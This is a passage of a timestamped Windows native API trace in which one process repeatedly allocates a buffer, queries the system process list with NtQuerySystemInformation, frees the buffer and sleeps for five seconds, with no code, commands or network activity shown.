BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.521] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0148.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0148.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0148.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0148.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0148.890] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0148.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0148.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, 